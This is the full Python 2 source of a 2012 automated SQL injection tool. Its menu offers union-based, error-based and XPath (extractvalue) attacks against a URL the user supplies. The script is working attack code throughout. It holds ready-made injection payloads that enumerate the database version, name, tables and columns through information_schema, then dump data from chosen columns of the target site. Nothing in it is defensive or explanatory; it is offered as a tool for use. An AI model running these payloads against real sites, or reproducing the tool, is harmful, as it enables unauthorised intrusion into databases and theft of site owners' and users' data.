HF-SQL Injection Tool v0.2

1. #!/usr/bin/python
2. '''         A Simple MySQL Injection Tool
3.   +---------------------------------------------+
4.   | Coded by : 5K0N4                            |                
5.   | version : 07:17 AM, June 30, 2012 (v0.2)   |
6.   | bugs & suggestions : Kaiji-kun@hotmail.com  |
7.   + --------------------------------------------+
8.                                               '''
9. from bs4 import BeautifulSoup
10. import urllib, urllib2, re, webbrowser, sys, os, time, string
11.  
12. class App(object):
13.     def Clean(self):
14.         if sys.platform == 'linux':
15.             clear = 'clear'
16.         elif sys.platform == 'win32':
17.             clear = 'cls'
18.         os.system(clear)
19.     def Routine(self):
20.         equals = '='
21.         print("Enter the site:")
22.         global site
23.         site = raw_input(">>> ")
24.         if site == 'exit':
25.             exit
26.         while 'www' and 'http://' and '.' not in site:
27.             print("[!] Please enter a valid site!")
28.             site = raw_input(">>> ")
29.             print("[=============================]")
30.         while site == int():
31.             print("[!] You entered an integer.Please enter the site")
32.             site = raw_input(">>> ")
33.             print("[===============================================]")
34.         if site[:4] != "http":
35.             site = "http://"+ str(site)
36.         if equals in site:
37.             site = site.replace("=", "=-")                
38.         if site.endswith("/*"):
39.             site = site.rstrip('/*')
40.         if site.endswith("#"):
41.             site = site.rstrip("#")
42.     def UnionBased(self):  
43.         eqmin = '=-'
44.         equals = '='
45.         print("")
46.         print(" [Union Based]")
47.         print("---------------")
48.         self.Routine()
49.         print(" [!] Getting column count...")
50.         print("")
51.         global site
52.         site = site.replace('=-', '=')
53.         for i in range(2,30):
54.                 url = site + '+order+by+%s--' % (i)
55.                 URL = urllib.urlopen(url)
56.                 Html = URL.read()
57.                 soup = BeautifulSoup("".join(Html))
58.                 bsoup = soup.findAll('', text = True)
59.                 bsoup = str(bsoup)
60.                 bsoup = re.sub('<[^<]+?>', '', bsoup)
61.                 search = re.search("You have an error", bsoup)
62.                 search2 = re.search("Unknown column", bsoup)
63.                 search3 = re.search("Error", bsoup)
64.                 search4 = re.search("SQL", bsoup)
65.                 if search == None and search2 == None and search3 == None and search4 == None:
66.                     pass
67.                 else:
68.                     I = i - 1
69.                     print("Column count is: " + str(I))
70.                     break
71.         site = site.replace('=', '=-')
72.         print("[==================]")
73.         print(" [!] Getting vulnerable columns...")
74.         ColumnS = ','.join([str(y) for y in range(1,i)])
75.         url = site + '+union+select+%s--' % (ColumnS)
76.         URL = urllib.urlopen(url)
77.         Html = URL.read()
78.         vul = re.findall(r'<[^<]+?>\d+<[^<]+?>', Html)
79.         vul = str(vul)
80.         vul = re.sub('<.*?>',"", vul)
81.         vul = re.sub("'", "", vul)
82.         vul = re.sub('"', "", vul)
83.         vul = vul.strip('[')
84.         vul = vul.strip(']')
85.         print("[====================]")
86.         print("Vulnerable Colums: " + vul)
87.         print("")
88.  
89.         print("Select vulnerable column to test for db version:")
90.         ColumnS = ColumnS.replace(raw_input((">>> ")),'@@version')
91.         if ColumnS == '-n' or ColumnS == 'n':
92.             new = 2
93.             url = url
94.             webbrowser.open(url,new=new)
95.         url = site + '+union+select+%s--' % (ColumnS)
96.         URL = urllib.urlopen(url)
97.         Html = URL.read()
98.         db = re.findall(r'<[^<]+?>\d+<[^<]+?>', Html)
99.         search = re.findall('5.0', Html)
100.         search2 = re.findall('4.0.', Html)
101.         search3 = re.findall('5.1.', Html)
102.         db = '5.0'
103.         db2 = '4.0'
104.         db3 = '5.1.'
105.         if db in search:
106.             print("DB Server: MySQL >=5")
107.         if db2 in search2:
108.             print("DB Server: MySQL >=4")
109.         if db3 in search3:
110.             print("DB Server: MySQL >=5.1")
111.  
112.         print("")
113.         print(" [!] Getting Tables...")
114.         url = url.rstrip('--')
115.         URL = url.replace("@@version","group_concat(table_name,0x0a)") + '+from+information_schema.tables+where+table_schema=database()--'
116.         REQ = urllib.urlopen(URL)
117.         Html = REQ.read()
118.         tblSearch = re.findall("(\w+\s*,\s*\w+\s*(?:,\s*\w+\s*)*)", Html)
119.         tblSearch = str(tblSearch)
120.         tblSearch = re.sub('<.*?>',"", tblSearch)
121.         tblSearch = re.sub('<[^<]+?>', '', tblSearch)
122.         tblSearch = re.sub('<[^>]*>', '', tblSearch)
123.         tblSearch = re.sub(r'\\n', '', tblSearch)
124.         tblSearch = re.sub("'", "", tblSearch)
125.         tblSearch = re.sub('\\\\', '', tblSearch)
126.         tblSearch = tblSearch.strip('[')
127.         tblSearch = tblSearch.strip(']')
128.         print("[====================]")
129.         print("Tables Found: " + tblSearch)
130.         print("")
131.         print("Enter the table to inject")
132.         Tbl = raw_input('>>> ')
133.         if Tbl == '-n' or Tbl == 'n':
134.             print("")
135.             print(" [!] Redirecting in browser...")
136.             print("[============================]")
137.             new = 2
138.             url = URL
139.             webbrowser.open(url,new=new)
140.         while Tbl == int():
141.             print("[===========================================================]")
142.             print("[!] Please enter a string [or press n to redirect in browser]!")
143.             Tbl = raw_input(">>> ")
144.         Encoded = ','.join(str(ord(i)) for i in Tbl)  
145.         URL = url.rstrip('--')
146.         URL = url.replace("@@version", "group_concat(column_name,0x0a)") + '+from+information_schema.columns+where+table_name=char(%s)--' % (Encoded)
147.         REQ = urllib.urlopen(URL)
148.         Html = REQ.read()
149.         colSearch = re.findall("(\w+\s*,\s*\w+\s*(?:,\s*\w+\s*)*)", Html)  
150.         colSearch = str(colSearch)
151.         colSearch = re.sub('<.*?>',"", colSearch)
152.         colSearch = re.sub('<[^<]+?>', '', colSearch)
153.         colSearch = re.sub('<[^>]*>', '', colSearch)
154.         colSearch = re.sub(r'\\n', '', colSearch)
155.         colSearch = re.sub("'", "", colSearch)
156.         colSearch = re.sub('\\\\', '', colSearch)
157.         print("[====================]")
158.         print("Columns Found: " + colSearch)
159.         print("")
160.         print("Enter the columns to inject")
161.         Col1 = raw_input('Col #1 >>> ')
162.         Col2 = raw_input('Col #2 >>> ')
163.         if Col1 == '-n' or Col1 == 'n' or Col2 == '-n' or Col2 == 'n':
164.             print("")
165.             print("[!] Redirecting in browser...")
166.             print("[===========================]")
167.             new = 2
168.             url = URL
169.             webbrowser.open(url,new=new)
170.         print("[===============================]")
171.         print(" [!] Getting data from columns...")
172.         URL = url.rstrip('--')
173.         URL = url.replace('@@version', 'group_concat(%s,0x7e,%s)') % (Col1, Col2)
174.         URL = URL + '+from+%s--' % (Tbl)
175.         print URL
176.         REQ = urllib.urlopen(URL)
177.         Html = REQ.read()
178.         DataSearch = re.findall("(.*?)~(.*?),(.*?)", Html)
179.         DataSearch = str(DataSearch)
180.         DataSearch = re.sub('<.*?>',"", DataSearch)
181.         DataSearch = re.sub('<[^<]+?>', '', DataSearch)
182.         DataSearch = re.sub('<[^>]*>', '', DataSearch)
183.         DataSearch = re.sub(r'\\n', '', DataSearch)
184.         DataSearch = re.sub("'", "", DataSearch)
185.         DataSearch = re.sub('\\\\', '', DataSearch)
186.         if DataSearch == '[]':
187.             DataSearch = re.findall("(.*?)~(.*)", Html)
188.         print("[====================]")
189.         print("Data Found(%s,%s): " + str(DataSearch)) % (Col1, Col2)
190.         print("[===================]")
191.         print("No more Data to dump!")
192.         print("[===================]")
193.         print("Hit ENTER to restart. \n'n' to redirect in browser for data search. \n'exit' to exit.")
194.         end = raw_input(">>> ")
195.         if end == '-n' or end == 'n':
196.             new = 2
197.             url = URL
198.             webbrowser.open(url,new=new)
199.         elif end == 'exit':
200.             sys.exit()
201.         else:
202.             run = App()
203.             run.Clean()
204.             run.main()
205.            
206.     def ErrorBased(self):
207.         print("")
208.         print(" [Error Based] ")
209.         print("---------------")  
210.         self.Routine()
211.         print("[!] Trying Error Based Method...")
212.         minus = '=-'
213.         global site
214.         for minus in site:
215.             site = site.replace("=-", "=")
216.         url = site + '+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1--'
217.         URL = urllib.urlopen(url)
218.         Html = URL.read()
219.         soup = BeautifulSoup("".join(Html))
220.         bsoup = soup.findAll('', text = True)
221.         bsoup = str(bsoup)
222.         bsoup = re.sub('<[^<]+?>', '', bsoup)
223.         searching = re.search("Duplicate entry '5.1", bsoup)
224.         searching2 = re.search("Duplicate entry '5", bsoup)
225.        
226.         if searching == None and searching2 == None:
227.             print("DB Server: MySQL >=4")
228.         elif searching == None:
229.             print("DB Server: MySQL >=5")
230.         else:
231.              print("DB Server: MySQL >=5.1")
232.            
233.         url = site + '+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(database()+as+char),0x7e))+from+information_schema.tables+where+table_schema=database()+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)'
234.         URL = urllib.urlopen(url)
235.         Html = URL.read()
236.         m = re.compile("'(.*?)~1'").search(Html)
237.         soup = BeautifulSoup("".join(Html))
238.         bsoup = soup.findAll('', text = True)
239.         bsoup = str(bsoup)
240.         bsoup = re.sub('<[^<]+?>', '', bsoup)
241.         find = re.findall("'([^']*)'", bsoup)
242.         find = str(find)
243.         find = re.sub("'", "", find)
244.         find = re.sub("~1", "", find)
245.         find = re.sub(",", "", find)
246.         dbname = str(find)
247.         dbname = dbname.strip('[')
248.         dbname = dbname.strip(']')
249.         try:
250.             mgr = m.group(1)
251.         except AttributeError:
252.             print("")
253.             print("Website does not seem to be vulnerable to Error Based Method!")
254.             print("Restarting in 5...")
255.             time.sleep(5)
256.             run = App()
257.             run.Clean()
258.             run.main()    
259.         print("")
260.         print("DB Name: " + m.group(1))
261.         print("")
262.         print(" [!] Getting tables from DB...")
263.         for i in range(0,71):  
264.             url = site + '+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_name+as+char),0x7e))+from+information_schema.tables+where+table_schema=database()+limit+%s,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)' % (i)
265.             URL = urllib.urlopen(url)
266.             Html = URL.read()
267.             s = re.compile("'(.*?)~1'").search(Html)
268.             Html = re.sub('~1', '', Html)
269.             soup = BeautifulSoup("".join(Html))
270.             bsoup = soup.findAll('', text = True)
271.             bsoup = str(bsoup)
272.             bsoup = re.sub('<[^<]+?>', '', bsoup)
273.             find = re.findall("'([^']*)'", bsoup)
274.             find = list(find)
275.             Find = str(find[-1])
276.             if Find == '\n' or Find == '\\n' or Find == ', u':
277.                 print("[============================]")
278.                 print(" [!] There are no more tables to find!")
279.                 break
280.             print("[============================]")
281.             print("Found table: " + s.group(1))
282.  
283.         print("[=======================]")
284.         print("Enter the table to inject")
285.         tbl = raw_input(">>> ")
286.         Tbl = tbl.encode('hex')
287.         for i in range(0,23):
288.             url = site + '+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(column_name+as+char),0x7e))+from+information_schema.columns+where+table_name=0x%s+limit+%s,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)' % (Tbl, i)
289.             URL = urllib.urlopen(url)
290.             Html = URL.read()
291.             s = re.compile("'(.*?)~1'").search(Html)  
292.             Html = re.sub('~1', '', Html)
293.             soup = BeautifulSoup("".join(Html))
294.             bsoup = soup.findAll('', text = True)
295.             bsoup = str(bsoup)
296.             bsoup = re.sub('<[^<]+?>', '', bsoup)
297.             find = re.findall("'([^']*)'", bsoup)
298.             find = list(find)
299.             Find = str(find[-1])
300.             if Find == '\n' or Find == '\\n' or Find == ', u':
301.                 print("[============================]")
302.                 print(" [!] There are no more columns to find!")
303.                 break
304.             print("[============================]")
305.             print("Found column: " + s.group(1))
306.  
307.         print("[============================]")
308.         print("Enter the columns to inject")
309.         col1 = raw_input("Col #1 >>> ")
310.         col2 = raw_input("Col #2 >>> ")
311.         dbname = dbname.strip('[')
312.         dbname = dbname.strip(']')
313.         for i in range(0,23):
314.             url = site + '+and(select+1+from(select+count(*),concat((select+(select(SELECT+concat(0x7e,0x27,cast(%s.%s+as+char),0x27,0x7e)+FROM+`%s`.%s+LIMIT+%s,1)+)+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1' % (tbl, col1, mgr, tbl, i)
315.             URL = urllib.urlopen(url)
316.             Html = URL.read()
317.             m = re.compile("'(.*?)'~1'").search(Html)
318.             Html = re.sub('~1', '', Html)
319.             soup = BeautifulSoup("".join(Html))
320.             bsoup = soup.findAll('', text = True)
321.             bsoup = str(bsoup)
322.             bsoup = re.sub('<[^<]+?>', '', bsoup)
323.             find = re.findall("'([^']*)'", bsoup)
324.             find = list(find)
325.             Find = str(find[-1])
326.             if Find == '\n' or Find == '\\n' or Find == ', u':
327.                 print("[============================]")
328.                 print(" [!] There is no more data to dump from %s!") % col1
329.                 break
330.             print("[============================]")
331.             print("Data from %s: " + m.group(0)) % col1
332.  
333.         for i in range(0,23):
334.             url = site + '+and(select+1+from(select+count(*),concat((select+(select(SELECT+concat(0x7e,0x27,cast(%s.%s+as+char),0x27,0x7e)+FROM+`%s`.%s+LIMIT+%s,1)+)+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1' % (tbl, col2, mgr, tbl, i)
335.             URL = urllib.urlopen(url)
336.             Html = URL.read()
337.             s = re.compile("'(.*?)'~1'").search(Html)
338.             Html = re.sub('~1', '', Html)
339.             soup = BeautifulSoup("".join(Html))
340.             bsoup = soup.findAll('', text = True)
341.             bsoup = str(bsoup)
342.             bsoup = re.sub('<[^<]+?>', '', bsoup)
343.             find = re.findall("'([^']*)'", bsoup)
344.             find = list(find)
345.             Find = str(find[-1])
346.             if Find == '\n' or Find == '\\n' or Find == ', u':
347.                 print("[============================")
348.                 print(" [!] There is no more data to dump from %s!") % col2
349.                 break
350.             print("[============================]")
351.             print("Data from %s: " + s.group(0)) % col2
352.         print("No more Data to dump!")
353.         print("[===================]")
354.         print("Hit ENTER to restart.\n'exit' to exit.")
355.         end = raw_input(">>> ")
356.         if end == 'exit':
357.             sys.exit()
358.         else:
359.             run = App()
360.             run.Clean()
361.             run.main()
362.  
363.     def Xpath(self):
364.         print("")
365.         print(" [XPath Injection] ")
366.         print("-------------------")  
367.         self.Routine()
368.         minus = '=-'
369.         global site
370.         for minus in site:
371.             site = site.replace("=-", "=")
372.         url = site + '+and+extractvalue(rand(),concat(0x7e,version()))--'
373.         URL = urllib.urlopen(url)
374.         Html = URL.read()
375.         soup = BeautifulSoup("".join(Html))
376.         bsoup = soup.findAll('', text = True)
377.         bsoup = str(bsoup)
378.         bsoup = re.sub('<[^<]+?>', '', bsoup)
379.         searching = re.search("XPATH syntax", bsoup)
380.         if searching == None:
381.             print(" [!] Website does not seem to be vulnerable to XPath!")
382.             print(" [!] Restarting in 5...")
383.             time.sleep(5)
384.             run = App()
385.             run.Clean()
386.             run.main()
387.         else:
388.             print("DB Server: MySQL >=5.1")
389.             print("[=====================]")
390.         for i in range(0,71):
391.             url = site + '+and+extractvalue(rand(),concat(0x0a,(select+concat(0x3a,table_name)+from+information_schema.tables+WHERE+table_schema=database()+limit+%s,1)))--' % (i)
392.             URL = urllib.urlopen(url)
393.             Html = URL.read()      
394.             m = re.compile(":\s'\n:(.*?)'").search(Html)
395.             Html = re.sub('~', '', Html)
396.             search = re.search('You have an', Html)
397.             search2 = re.search('XPATH', Html)
398.             if search != None or search2 == None:
399.                 print("")
400.                 print(" [!] There are no more tables to find!")
401.                 print("[====================================]")
402.                 break
403.             print("Found table: " + m.group(1))
404.             print("[=========================]")
405.            
406.         print("Enter the table to inject ")
407.         tbl = raw_input(">>> ")
408.         Tbl = tbl.encode('hex')
409.         for i in range(0,23):
410.             url = site + '+and+extractvalue(rand(),concat(0x0a,(select+concat(0x3a,column_name)+from+information_schema.columns+where+table_name=0x%s+limit+%s,1)))--+x' % (Tbl, i)
411.             URL = urllib.urlopen(url)
412.             Html = URL.read()
413.             m = re.compile(":\s'\n:(.*?)'").search(Html)
414.             Html = re.sub('~', '', Html)
415.             search = re.search('You have an', Html)
416.             search2 = re.search('XPATH', Html)
417.             if search != None or search2 == None:
418.                 print("")
419.                 print(" [!] There are no more columns to find!")
420.                 print("[=====================================]")
421.                 break
422.             print("Found column: " + m.group(1))
423.             print("[==========================]")
424.  
425.         print("Enter the columns to inject ")
426.         Col1 = raw_input("Col #1>>> ")
427.         Col2 = raw_input("Col #2>>> ")
428.         for i in range(0,23):
429.             url = site + '+and+extractvalue(rand(),concat(0x3a,(select+concat(%s,0x3a,%s)+from+%s+limit+%s,1)))--+x' % (Col1, Col2, tbl, i)
430.             URL = urllib.urlopen(url)
431.             Html = URL.read()
432.             m = re.compile(":\s':(.*?):(.*?)'").search(Html)
433.             search = re.search('You have an', Html)
434.             search2 = re.search('XPATH', Html)
435.             if search != None or search2 == None:
436.                 print("")
437.                 print(" [!] There is no more data to dump!")
438.                 print("[=================================]")
439.                 break
440.             print("[-----------%s:%s------------]") % (Col1, Col2)
441.             print("Found Data" + m.group())
442.             print("[==========================]")
443.         print("No more Data to dump!")
444.         print("[===================]")
445.         print("Hit ENTER to restart.\n'exit' to exit.")
446.         end = raw_input(">>> ")
447.         if end == 'exit':
448.             sys.exit()
449.         else:
450.             run = App()
451.             run.Clean()
452.             run.main()
453.            
454.     def main(self):
455.         self.Clean()
456.         print(" +========================+ ")
457.         print(" | SQLi TooL Version 0.2  | ")
458.         print(" | Help : -help           | ")
459.         print(" | Coded by : 5K0N4       | ")
460.         print(" +========================+ ")
461.         print(" +========================+ ")
462.         print(" |_____Choose Method______| ")
463.         print(" |-----[1]Union Based-----| ")
464.         print(" |---[2]XPath Injection---| ")
465.         print(" |-----[3]Error Based-----| ")
466.         print(" +========================+ ")
467.         choice = raw_input(">>> ")
468.         while choice !='1' and choice !='2' and choice != '3' and choice !='-h' and choice !='-help' and choice != 'exit':
469.             print("Please enter a valid option [-h for help]!")
470.             choice = raw_input(">>> ")
471.         if choice == 'exit':
472.             sys.exit()
473.         elif choice == '-help' or choice == '-h':
474.             print("=======================")
475.             print("Union Based: ")
476.             print("")
477.             print("If the program didn't find anything usefull you can \npress '-n' or 'n' to redirect in browser to seach manually!")
478.             print("[---------------------------------------------------------]")
479.             print("Also there's a bug in 'Tables Found:','Columns Found:' and 'Data Found:' - \nBeware that some of those won't be valid tables\\columns but html elements!")
480.             print("[------------------------------------------------------------------------]")
481.             print("Hit ENTER to restart")
482.             restart = raw_input(">>> ")
483.             run = App()
484.             run.main()
485.         if choice == '1':
486.             self.Clean()
487.             self.UnionBased()
488.         elif choice == '2':
489.             self.Clean()
490.             self.Xpath()
491.         elif choice == '3':
492.             self.Clean()
493.             self.ErrorBased()
494.  
495. if __name__ == '__main__':
496.     run = App()
497.     run.main()